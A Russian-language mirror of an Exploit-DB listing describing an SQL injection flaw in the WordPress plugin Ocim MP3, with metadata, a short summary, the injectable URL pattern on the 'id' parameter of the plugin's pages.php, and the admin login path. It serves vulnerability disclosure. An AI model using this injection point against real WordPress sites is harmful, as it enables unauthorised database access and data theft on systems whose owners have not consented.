- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 39498
- Проверка EDB
-
- Пройдено
- Автор
- XEVIL & BLANKON33
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2016-02-26
WordPress Plugin Ocim MP3 - SQL Injection
Код:
========
Ocim MP3 Plugin SQL Injection Vulnerability
========
:----------------------------------------------------------------------------------------------------:
: # Exploit Title : Ocim MP3 Plugin SQL Injection Vulnerability
: # Date : 26 February 2016
: # Author : xevil and Blankon33
: # Vendor Site: http://www.ocimscripts.com/
: # Version:
: # Vulnerability : SQL Injection
: # Tested on : Wordpress 4.4.2
: # Severity : High
:----------------------------------------------------------------------------------------------------:
Summary
========
Ocim MP3 is Plugin to make MP3 Grabber site based on Wordpress.
Proof of Concept
========
Infected URL:
http://[Site]/[Path]/wp-content/plugins/ocim-mp3/source/pages.php?id=['SQLi]
Admin Panel:
http://[Site]/[Path]/oc-login.php
===========
Thanks to
===========
All Indonesian Hacker!!!- Источник
- www.exploit-db.com
